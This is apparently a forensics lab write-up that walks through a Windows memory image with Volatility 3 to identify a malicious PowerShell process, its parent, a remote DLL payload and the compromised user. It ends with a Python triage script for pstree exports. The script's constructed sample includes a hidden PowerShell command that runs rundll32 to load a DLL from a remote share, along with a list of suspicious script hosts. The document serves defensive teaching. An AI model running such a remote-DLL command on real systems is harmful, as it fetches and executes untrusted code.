First of all, to answer this Endpoint Forensics machine we look at the process list to work out what happened. After installing Volatility 3 from this repository:
https://github.com/volatilityfoundation/volatility3
I pass the memory image with the "-f" parameter, followed by the path to the file, and run the "windows.pstree" plugin to get the process tree, then export the output to a text file so it can be searched. The full command is shown below.
1- To identify the malicious process I went through the exported output. Judging by the PPID and the process name, my pick is PID "4120": it is a newly created process, and its image is "powershell.exe", the most popular script runner. In its command line I found an IP address; I submitted it to VirusTotal, which flags it as malicious.
2- This question asks for the PPID, which is read from the same pstree line as the previous answer.
3- The filename used by the malware to execute the second payload is still on the same line: it is a DLL file. Because the whole activity runs through PowerShell, every small detail in that command line leads you to the important information.
4- Still in the same command: the shared folder appears right after the IP address the malware communicated with (:
5- Here they want the MITRE sub-technique ID. Note that "Defense Evasion" is the tactic, not the technique; the sub-technique we need is the one for executing a payload through a DLL, so look it up under the Defense Evasion tactic in the ATT&CK matrix (sub-technique IDs have the form Txxxx.xxx).
6- To determine the username I used Volatility again, this time with the UserAssist plugin (windows.registry.userassist), which reveals the username easily. Uncle Elon was compromised; I think the attacker sent him an email offering a chance to win an iPhone 16 (:
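Questions 1 to 4 are all answered from one line of the pstree output, so here is a small triage script that automates that reading: it parses a Volatility 3 windows.pstree export, flags script hosts whose command line references an IP address, a UNC share or a DLL, and prints the PID, PPID, parent chain and the extracted indicators. This is an added example, not code from the original writeup or from Volatility; the sample pstree text is constructed (the PIDs, the 192.0.2.10 address, the "share" folder and "payload.dll" are made up) and is simplified to the PID, PPID, ImageFileName, CreateTime and Cmd columns. It assumes the Cmd column that recent Volatility 3 builds print in windows.pstree; on older builds you would join in windows.cmdline output instead.

```python
import re
from dataclasses import dataclass

# Constructed sample modelled on the tab-separated layout of
#   vol.py -f <memory image> windows.pstree > pstree.txt
# (leading '*' characters mark tree depth). Nothing here is from the lab image.
SAMPLE_ROWS = [
    ("PID", "PPID", "ImageFileName", "CreateTime", "Cmd"),
    ("4", "0", "System", "2024-01-01 10:00:00", "N/A"),
    ("* 600", "4", "smss.exe", "2024-01-01 10:00:01", r"\SystemRoot\System32\smss.exe"),
    ("1200", "900", "explorer.exe", "2024-01-01 10:05:00", r"C:\Windows\Explorer.EXE"),
    ("* 3300", "1200", "WINWORD.EXE", "2024-01-01 10:20:00",
     r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\elon\Downloads\invoice.docx"'),
    ("** 4120", "3300", "powershell.exe", "2024-01-01 10:21:07",
     r'powershell.exe -w hidden -c "rundll32 \\192.0.2.10\share\payload.dll,Start"'),
]
SAMPLE_PSTREE = "\n".join("\t".join(row) for row in SAMPLE_ROWS)

# Script hosts and proxy-execution binaries worth a second look when they
# reach out to the network or load a DLL from a remote path (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
UNC_RE = re.compile(r"\\\\[^\\\s\"]+\\[^\\\s\",]+")      # \\host\share
DLL_RE = re.compile(r"[\w.-]+\.dll\b", re.IGNORECASE)


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    create_time: str
    cmd: str


def parse_pstree(text: str) -> dict[int, Proc]:
    """Parse a tab-separated pstree export into a PID -> Proc map."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    idx = {col: i for i, col in enumerate(lines[0].split("\t"))}
    procs = {}
    for line in lines[1:]:
        cols = line.split("\t")
        pid = int(cols[idx["PID"]].lstrip("* "))   # drop tree-depth markers
        procs[pid] = Proc(pid, int(cols[idx["PPID"]]), cols[idx["ImageFileName"]],
                          cols[idx["CreateTime"]], cols[idx["Cmd"]])
    return procs


def ancestry(procs: dict[int, Proc], pid: int) -> list[Proc]:
    """Walk PPID links upward; stops at an unknown parent or a loop."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid].ppid
    return chain


def triage(procs: dict[int, Proc]) -> list[dict]:
    """Flag script hosts whose command line carries network or DLL indicators."""
    findings = []
    for p in procs.values():
        ips, shares, dlls = IPV4_RE.findall(p.cmd), UNC_RE.findall(p.cmd), DLL_RE.findall(p.cmd)
        if p.name.lower() in SCRIPT_HOSTS and (ips or shares or dlls):
            parent = procs.get(p.ppid)
            findings.append({
                "pid": p.pid, "ppid": p.ppid, "name": p.name,
                "parent": parent.name if parent else "?",
                "chain": " <- ".join(f"{q.name}({q.pid})" for q in ancestry(procs, p.pid)),
                "ips": sorted(set(ips)), "shares": shares, "dlls": dlls,
            })
    return findings


if __name__ == "__main__":
    # Replace SAMPLE_PSTREE with open("pstree.txt").read() on a real export.
    for f in triage(parse_pstree(SAMPLE_PSTREE)):
        print(f"{f['name']} PID={f['pid']} PPID={f['ppid']} parent={f['parent']}")
        print(f"  chain : {f['chain']}")
        print(f"  ips   : {f['ips']}\n  shares: {f['shares']}\n  dlls  : {f['dlls']}")
```

The parent chain is what makes the pick defensible: a PowerShell spawned by an Office document, hitting a remote share and loading a DLL from it, is a far stronger call than "powershell.exe looks suspicious". The IP addresses the script extracts are the ones to check on VirusTotal, and the share and DLL names are the answers to questions 3 and 4.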